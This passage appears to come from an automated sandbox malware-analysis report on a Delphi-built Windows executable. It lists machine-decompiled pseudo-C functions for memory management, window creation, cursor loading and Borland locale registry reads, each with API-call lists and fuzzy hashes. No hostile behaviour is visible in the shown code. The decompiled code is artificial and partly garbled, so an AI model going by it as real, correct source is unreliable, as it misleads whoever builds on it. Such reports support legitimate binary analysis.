    					 *0x47b5bc = 1;
    				}
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E00401C47);
    				if( *0x47b045 != 0) {
    					_push(0x47b5c4);
    					L00401360();
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
    • RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
    • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
    • RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
    • String ID:
    • API String ID: 730355536-0
    • Opcode ID: 67454cfca43f0267e9263a94266ffb6b98c2692df696fa2f445533be90ddefb8
    • Instruction ID: 3e142aa4a2e204c3b9438245db62d6d6d1a92e12098fe18446b9b4d1fc31f7ac
    • Opcode Fuzzy Hash: 67454cfca43f0267e9263a94266ffb6b98c2692df696fa2f445533be90ddefb8
    • Instruction Fuzzy Hash: 40118EB0A48245AFE715EB6A8901B9AB7E1EB45308F10C07BF508A77E1C77C9940DB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 69%
    			E00401B78() {
    				intOrPtr* _v8;
    				void* _t17;
    				signed int _t19;
    				intOrPtr _t28;
    				void* _t29;
    				intOrPtr _t34;
    
    				_push(_t34);
    				_push(E00401C40);
    				_push( *[fs:edx]);
    				 *[fs:edx] = _t34;
    				_push(0x47b5c4);
    				L00401350();
    				if( *0x47b045 != 0) {
    					_push(0x47b5c4);
    					L00401358();
    				}
    				E004013F4(0x47b5e4);
    				E004013F4(0x47b5f4);
    				E004013F4(0x47b620);
    				_t17 = LocalAlloc(0, 0xff8); // executed
    				 *0x47b61c = _t17;
    				if( *0x47b61c != 0) {
    					_t19 = 3;
    					do {
    						_t29 =  *0x47b61c; // 0x5bc9b8
    						 *((intOrPtr*)(_t29 + _t19 * 4 - 0xc)) = 0;
    						_t19 = _t19 + 1;
    					} while (_t19 != 0x401);
    					_v8 = 0x47b604;
    					 *((intOrPtr*)(_v8 + 4)) = _v8;
    					 *_v8 = _v8;
    					 *0x47b610 = _v8;
    					 *0x47b5bc = 1;
    				}
    				_pop(_t28);
    				 *[fs:eax] = _t28;
    				_push(E00401C47);
    				if( *0x47b045 != 0) {
    					_push(0x47b5c4);
    					L00401360();
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
    • RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
    • LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
    • RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
    • String ID:
    • API String ID: 730355536-0
    • Opcode ID: b6d80f13ff715241ca5bf995b1febabb0cb351f15c19564836d61e8c853322d1
    • Instruction ID: 13d9f034b082f7c1e47b122caaa5f201a4d4fe53c14004c021a2778dc1c28102
    • Opcode Fuzzy Hash: b6d80f13ff715241ca5bf995b1febabb0cb351f15c19564836d61e8c853322d1
    • Instruction Fuzzy Hash: 6C1190B0A48245AFE715EB6AC901B9EB7E1EB45308F10C07BE508A77E1C77C9940DB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E004224C4(int _a4) {
    				void* __ebx;
    				void* __ebp;
    				signed int _t2;
    				signed int _t3;
    				void* _t7;
    				int _t8;
    				void* _t12;
    				void* _t13;
    				void* _t17;
    				void* _t18;
    
    				_t8 = _a4;
    				if( *0x47b938 == 0) {
    					 *0x47b910 = E004223DC(0, _t8,  *0x47b910, _t17, _t18);
    					_t7 =  *0x47b910(_t8); // executed
    					return _t7;
    				}
    				_t3 = _t2 | 0xffffffff;
    				_t12 = _t8 + 0xffffffb4 - 2;
    				__eflags = _t12;
    				if(__eflags < 0) {
    					_t3 = 0;
    				} else {
    					if(__eflags == 0) {
    						_t8 = 0;
    					} else {
    						_t13 = _t12 - 1;
    						__eflags = _t13;
    						if(_t13 == 0) {
    							_t8 = 1;
    						} else {
    							__eflags = _t13 - 0xffffffffffffffff;
    							if(_t13 - 0xffffffffffffffff < 0) {
    								_t3 = 1;
    							}
    						}
    					}
    				}
    				__eflags = _t3 - 0xffffffff;
    				if(_t3 != 0xffffffff) {
    					return _t3;
    				} else {
    					return GetSystemMetrics(_t8);
    				}
    			}

    APIs
    • GetSystemMetrics.USER32(?), ref: 00422526
      • Part of subcall function 004223DC: GetProcAddress.KERNEL32(745C0000,00000000), ref: 0042245C
    • KiUserCallbackDispatcher.NTDLL(?), ref: 004224EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AddressCallbackDispatcherMetricsProcSystemUser
    • String ID: GetSystemMetrics
    • API String ID: 54681038-96882338
    • Opcode ID: 9120b39a1c952422c7a2f2bc6e6230ad17a44d77e4132149589b957536ae4e38
    • Instruction ID: 61893786ead7442b141782ae33ef24c81ab3f08944c6df3ae78c7b5cce71f94f
    • Opcode Fuzzy Hash: 9120b39a1c952422c7a2f2bc6e6230ad17a44d77e4132149589b957536ae4e38
    • Instruction Fuzzy Hash: 7EF0C2A03051147ACA115A38BFA43233505E755334FE0CB27A325862D5DBFD88C1524D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
      • Part of subcall function 00401B78: RtlInitializeCriticalSection.NTDLL(0047B5C4), ref: 00401B8F
      • Part of subcall function 00401B78: RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 00401BA2
      • Part of subcall function 00401B78: LocalAlloc.KERNEL32(00000000,00000FF8,00000000,00401C40), ref: 00401BCC
      • Part of subcall function 00401B78: RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 00401C3A
    • RtlEnterCriticalSection.NTDLL(0047B5C4), ref: 0040241D
    • RtlLeaveCriticalSection.NTDLL(0047B5C4), ref: 0040256A
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
    • String ID:
    • API String ID: 2227675388-0
    • Opcode ID: a4d65b0a6d92e3d8387b000d624c99de197c7ddb0f799f075070be329c2464f0
    • Instruction ID: b52d1db9be2b77f96f069aba8dce174cc18355d9363bc801bcba1231b71f0c2b
    • Opcode Fuzzy Hash: a4d65b0a6d92e3d8387b000d624c99de197c7ddb0f799f075070be329c2464f0
    • Instruction Fuzzy Hash: FC512EB0E002099FDB10CF69DA85A5EB7F1FB48314F24817AD819A73D1D3789981CB9D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E00448C44(char __edx, void* __edi) {
    				char _v5;
    				void* __ebx;
    				void* __ecx;
    				void* __ebp;
    				intOrPtr _t25;
    				intOrPtr* _t28;
    				intOrPtr* _t29;
    				intOrPtr _t42;
    				intOrPtr* _t45;
    				intOrPtr _t56;
    				intOrPtr _t57;
    				intOrPtr _t58;
    				intOrPtr _t59;
    				intOrPtr _t62;
    				void* _t63;
    				char _t64;
    				void* _t74;
    				intOrPtr _t75;
    				void* _t76;
    				void* _t77;
    
    				_t74 = __edi;
    				_t64 = __edx;
    				if(__edx != 0) {
    					_t77 = _t77 + 0xfffffff0;
    					_t25 = E0040378C(_t25, _t76);
    				}
    				_v5 = _t64;
    				_t62 = _t25;
    				E00419808(_t63, 0);
    				_t28 =  *0x479e04; // 0x4793b4
    				 *((intOrPtr*)(_t28 + 4)) = _t62;
    				 *_t28 = 0x448fe8;
    				_t29 =  *0x479e10; // 0x4793bc
    				 *((intOrPtr*)(_t29 + 4)) = _t62;
    				 *_t29 = 0x448ff4;
    				E00449000(_t62);
    				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
    				 *((intOrPtr*)(_t62 + 0x4c)) = E0040343C(1);
    				 *((intOrPtr*)(_t62 + 0x50)) = E0040343C(1);
    				 *((intOrPtr*)(_t62 + 0x54)) = E0040343C(1);
    				 *((intOrPtr*)(_t62 + 0x58)) = E0040343C(1);
    				_t42 = E0040343C(1);
    				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
    				L0040677C();
    				_t75 = _t42;
    				L00406514();
    				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
    				L004069B4();
    				_t11 = _t62 + 0x58; // 0x4420046e
    				_t45 =  *0x479f50; // 0x47b92c
    				 *((intOrPtr*)( *_t45))(0, 0, E00445418,  *_t11, 0, _t75, _t75, 0x5a, 0);
    				 *((intOrPtr*)(_t62 + 0x84)) = E0041C694(1);
    				 *((intOrPtr*)(_t62 + 0x88)) = E0041C694(1);
    				 *((intOrPtr*)(_t62 + 0x80)) = E0041C694(1);
    				E00449450(_t62, _t62, _t63, _t74);
    				_t15 = _t62 + 0x84; // 0x38004010
    				_t56 =  *_t15;
    				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
    				 *((intOrPtr*)(_t56 + 8)) = 0x449318;
    				_t18 = _t62 + 0x88; // 0x90000000
    				_t57 =  *_t18;
    				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
    				 *((intOrPtr*)(_t57 + 8)) = 0x449318;
    				_t21 = _t62 + 0x80; // 0x94000000
    				_t58 =  *_t21;
    				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
    				 *((intOrPtr*)(_t58 + 8)) = 0x449318;
    				_t59 = _t62;
    				if(_v5 != 0) {
    					E004037E4(_t59);
    					_pop( *[fs:0x0]);
    				}
    				return _t62;
    			}

    APIs
    • GetKeyboardLayout.USER32(00000000), ref: 00448C89
    • 72E7AC50.USER32(00000000,?,?,00000000,?,004371FA,00000000,00000000,?,?,00000000,00437278), ref: 00448CDE
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: KeyboardLayout
    • String ID:
    • API String ID: 194098044-0
    • Opcode ID: f1f0f8e711b1a06e5d00e45fe006f41a4c385eb94d7e613cd437ce41573341e4
    • Instruction ID: 19571bcea3be0b8c6a5e08f2715e41f6178fab2f008b285dc990ddbe9316995e
    • Opcode Fuzzy Hash: f1f0f8e711b1a06e5d00e45fe006f41a4c385eb94d7e613cd437ce41573341e4
    • Instruction Fuzzy Hash: 37310CB06002409FD740EF29DCC1B997BE4BB05319F4490BAE908DF3A6D7399C48CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00449000(void* __eax) {
    				struct HICON__* _t5;
    				void* _t7;
    				void* _t8;
    				struct HINSTANCE__* _t11;
    				CHAR** _t12;
    				void* _t13;
    
    				_t13 = __eax;
    				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
    				_t8 = 0xffffffea;
    				_t12 = 0x479c38;
    				do {
    					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
    						if(_t8 != 0xffffffeb) {
    							_t11 = 0;
    						} else {
    							goto L4;
    						}
    					} else {
    						L4:
    						_t11 =  *0x47b660; // 0x400000
    					}
    					_t5 = LoadCursorA(_t11,  *_t12); // executed
    					_t7 = E004490D4(_t13, _t5, _t8);
    					_t8 = _t8 + 1;
    					_t12 =  &(_t12[1]);
    				} while (_t8 != 0xffffffff);
    				return _t7;
    			}

    APIs
    • LoadCursorA.USER32(00000000,00007F00), ref: 0044900D
    • LoadCursorA.USER32(00000000,00000000), ref: 0044903C
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CursorLoad
    • String ID:
    • API String ID: 3238433803-0
    • Opcode ID: 3e82a63330fc6ccb9e9839bef3e6e645eb624abf4ff21a79ec716908bc4b4c75
    • Instruction ID: 3d37015a7f1900adb8c35d2b4518091dae2baef75b5dba2374cc50d155544614
    • Opcode Fuzzy Hash: 3e82a63330fc6ccb9e9839bef3e6e645eb624abf4ff21a79ec716908bc4b4c75
    • Instruction Fuzzy Hash: BBF08221A002451BAA30563E5CC1A7B73C4DB81734F20033BFA3AC72E1CA3A5C416259
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004015D8(void* __eax, void** __edx) {
    				void* _t3;
    				void** _t8;
    				void* _t11;
    				long _t14;
    
    				_t8 = __edx;
    				if(__eax >= 0x100000) {
    					_t14 = __eax + 0x0000ffff & 0xffff0000;
    				} else {
    					_t14 = 0x100000;
    				}
    				_t8[1] = _t14;
    				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
    				_t11 = _t3;
    				 *_t8 = _t11;
    				if(_t11 != 0) {
    					_t3 = E004013FC(0x47b5e4, _t8);
    					if(_t3 == 0) {
    						VirtualFree( *_t8, 0, 0x8000);
    						 *_t8 = 0;
    						return 0;
    					}
    				}
    				return _t3;
    			}

    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0040196B), ref: 00401607
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0040196B), ref: 0040162E
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: e967e88bf4823c906c35652e866f2c951335c9b81b0acec8bd7694e8e2c81172
    • Instruction ID: ea28b3e0b89b1852fe17bb3a960f078d753cdc915c187a2f1f11c42d493a1027
    • Opcode Fuzzy Hash: e967e88bf4823c906c35652e866f2c951335c9b81b0acec8bd7694e8e2c81172
    • Instruction Fuzzy Hash: 2CF027B2B006202BEB2056AA0C81F5366C4CF85794F184077FE0CFF3D9C27A8C0242A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00406BE4(CHAR* __eax, CHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32) {
    				long _v8;
    				void* _t12;
    				struct HWND__* _t22;
    				long _t27;
    				CHAR* _t30;
    
    				_v8 = _t27;
    				_t30 = __eax;
    				_t12 = E00402C98();
    				_t22 = CreateWindowExA(0, _t30, __edx, _v8, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
    				E00402C88(_t12);
    				return _t22;
    			}

    APIs
    • CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00406C21
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CreateWindow
    • String ID:
    • API String ID: 716092398-0
    • Opcode ID: 05ccf17b2124ff4d4cee4c0e7c77d232d4f7fec68d285c8668bfd790e926e1b0
    • Instruction ID: 0e964218794f983bb9cd8bd5a4c19ac525971697ee49f243510a608c3f95afa3
    • Opcode Fuzzy Hash: 05ccf17b2124ff4d4cee4c0e7c77d232d4f7fec68d285c8668bfd790e926e1b0
    • Instruction Fuzzy Hash: D2F092B2604119BFDB80DE9EDD85E9B77ECEB4D264B01412ABA0CE7241D574ED1087A4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00405248(void* __eax) {
    				char _v272;
    				intOrPtr _t14;
    				void* _t16;
    				intOrPtr _t18;
    				intOrPtr _t19;
    
    				_t16 = __eax;
    				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
    					_t3 = _t16 + 4; // 0x400000
    					GetModuleFileNameA( *_t3,  &_v272, 0x105);
    					_t14 = E004054DC(_t19); // executed
    					_t18 = _t14;
    					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
    					if(_t18 == 0) {
    						_t5 = _t16 + 4; // 0x400000
    						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
    					}
    				}
    				_t7 = _t16 + 0x10; // 0x400000
    				return  *_t7;
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00405266
      • Part of subcall function 004054DC: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004054F7
      • Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405515
      • Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405533
      • Part of subcall function 004054DC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405551
      • Part of subcall function 004054DC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040559A
      • Part of subcall function 004054DC: RegQueryValueExA.ADVAPI32(?,0040575C,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,004055E0,?,80000001), ref: 004055B8
      • Part of subcall function 004054DC: RegCloseKey.ADVAPI32(?,004055E7,00000000,00000000,00000005,00000000,004055E0,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004055DA
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: Open$FileModuleNameQueryValue$Close
    • String ID:
    • API String ID: 2796650324-0
    • Opcode ID: f9c59cc811f721402053a0d0ac9b0ce6fcdbac75b8c4da85048b680b16bd63d6
    • Instruction ID: 952435f186fd52fa04dc92ae487686c42e4842c8c840e0a85f47681fa0619544
    • Opcode Fuzzy Hash: f9c59cc811f721402053a0d0ac9b0ce6fcdbac75b8c4da85048b680b16bd63d6
    • Instruction Fuzzy Hash: F5E06D71A017149FCB50DE98C8C1A9733D8AF08754F0009AAEC58EF386D3B4DD608BE8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00407E58(void* __eax, void* __edx) {
    				int _t3;
    				char* _t5;
    				int _t7;
    				int _t10;
    				void* _t12;
    
    				_t12 = __eax;
    				_t3 = E004044A0(__edx);
    				_t5 = E004046A0(__edx);
    				_t7 = E004044A0(_t12);
    				_t10 = CompareStringA(0x400, 1, E004046A0(_t12), _t7, _t5, _t3); // executed
    				return _t10 - 2;
    			}

    APIs
    • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,?,?,00407E9F,?,?,0040825D), ref: 00407E85
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: CompareString
    • String ID:
    • API String ID: 1825529933-0
    • Opcode ID: d2756fd8ef4fd80b28727ba66eddca8596a34e4d2668cf452345aa751b3a0bee
    • Instruction ID: a683a885328dd97e14061b284d8b7b125d665f2fecd80a81d0dc01761873f3db
    • Opcode Fuzzy Hash: d2756fd8ef4fd80b28727ba66eddca8596a34e4d2668cf452345aa751b3a0bee
    • Instruction Fuzzy Hash: 99D09EE13006102ED2507E7E6C82F5A008C4B8961DB41447AB309F62C2D9AD9D21026D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040177C(signed int __eax, intOrPtr* __ecx, void* __edx) {
    				signed int _v20;
    				void* _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				intOrPtr _t20;
    				void* _t35;
    				intOrPtr* _t39;
    				intOrPtr* _t48;
    				void** _t49;
    				signed int* _t50;
    				void** _t51;
    
    				_t51 =  &_v24;
    				_t39 = __ecx;
    				 *_t51 = __edx;
    				_t49 =  &_v32;
    				_t48 =  &_v36;
    				_t50 =  &_v28;
    				_v24 = __eax & 0xfffff000;
    				_v20 =  *_t51 + __eax + 0x00000fff & 0xfffff000;
    				 *__ecx = _v24;
    				 *((intOrPtr*)(__ecx + 4)) = _v20 - _v24;
    				_t20 =  *0x47b5e4; // 0x5ba724
    				 *_t48 = _t20;
    				while(0x47b5e4 !=  *_t48) {
    					_t10 =  *_t48 + 8; // 0x0
    					 *_t49 =  *_t10;
    					 *_t50 =  *((intOrPtr*)( *_t48 + 0xc)) +  *_t49;
    					if( *_t49 < _v24) {
    						 *_t49 = _v24;
    					}
    					if( *_t50 > _v20) {
    						 *_t50 = _v20;
    					}
    					if( *_t49 <  *_t50) {
    						_t35 = VirtualAlloc( *_t49,  *_t50 -  *_t49, 0x1000, 4); // executed
    						if(_t35 == 0) {
    							 *_t39 = 0;
    							return 0;
    						}
    					}
    					 *_t48 =  *((intOrPtr*)( *_t48));
    				}
    				return 0x47b5e4;
    			}

    APIs
    • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00401815
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: e828e366203037f96a61da22dd7e75198f0bcdcc3e16c2bbf3280b2be461549c
    • Instruction ID: 932f869aee27061ec9432b523909e9d10fc31dc4fe3c75e66ba591c0c286ebc2
    • Opcode Fuzzy Hash: e828e366203037f96a61da22dd7e75198f0bcdcc3e16c2bbf3280b2be461549c
    • Instruction Fuzzy Hash: C321E0B5604246DFC750CF2CC880A9AB7E0FF98354F14892AF998DB3A4D334E944CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040183C(void* __eax, void** __ecx, intOrPtr __edx) {
    				intOrPtr _t20;
    				int _t35;
    				signed int* _t38;
    				intOrPtr* _t44;
    				void** _t45;
    				intOrPtr* _t49;
    
    				 *_t49 = __edx;
    				_t45 = _t49 + 8;
    				_t44 = _t49 + 4;
    				_t38 = _t49 + 0xc;
    				 *(_t49 + 0x10) = __eax + 0x00000fff & 0xfffff000;
    				 *(_t49 + 0x14) = __eax +  *_t49 & 0xfffff000;
    				 *__ecx =  *(_t49 + 0x10);
    				__ecx[1] =  *(_t49 + 0x14) -  *(_t49 + 0x10);
    				_t20 =  *0x47b5e4; // 0x5ba724
    				 *_t44 = _t20;
    				while(0x47b5e4 !=  *_t44) {
    					_t10 =  *_t44 + 8; // 0x0
    					 *_t45 =  *_t10;
    					 *_t38 =  *((intOrPtr*)( *_t44 + 0xc)) +  *_t45;
    					if( *_t45 <  *(_t49 + 0x10)) {
    						 *_t45 =  *(_t49 + 0x10);
    					}
    					if( *_t38 >  *(_t49 + 0x14)) {
    						 *_t38 =  *(_t49 + 0x14);
    					}
    					if( *_t45 <  *_t38) {
    						_t35 = VirtualFree( *_t45,  *_t38 -  *_t45, 0x4000); // executed
    						if(_t35 == 0) {
    							 *0x47b5c0 = 2;
    						}
    					}
    					 *_t44 =  *((intOrPtr*)( *_t44));
    				}
    				return 0x47b5e4;
    			}

    APIs
    • VirtualFree.KERNEL32(?,?,00004000), ref: 004018CC
    Memory Dump Source
    • Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp
    • Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp
    • Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 4b430971f3da51b33c6ff197277bcc7b038da6347f6d05db9d7e968dd3773690
    • Instruction ID: b9677e816f5016dcd29266e224e189af4e18019ba84cb4f13ebd5ffe42c9e361
    • Opcode Fuzzy Hash: 4b430971f3da51b33c6ff197277bcc7b038da6347f6d05db9d7e968dd3773690
    • Instruction Fuzzy Hash: 3F2100B5604302DFC710DF28D880A1AB7E0FF89314F20896AE598DB354D330EA09CB96
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041A898(intOrPtr _a4, intOrPtr _a8) {
    				void* _t14;
    				void _t15;
    				intOrPtr _t25;
    				char* _t26;
    				void* _t35;
    
    				if( *0x47b8a0 == 0) {
    					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
    					_t35 = _t14;
    					_t15 =  *0x47b89c; // 0xa80000
    					 *_t35 = _t15;
    					_t1 = _t35 + 4; // 0x4
    					E00402C48(0x4793ec, 2, _t1);
    					_t2 = _t35 + 5; // 0x5
    					 *((intOrPtr*)(_t35 + 6)) = E0041A890(_t2, E0041A870);
    					_t4 = _t35 + 0xa; // 0xa
    					_t26 = _t4;
    					do {
    						 *_t26 = 0xe8;
    						_t5 = _t35 + 4; // 0x4
    						 *((intOrPtr*)(_t26 + 1)) = E0041A890(_t26, _t5);
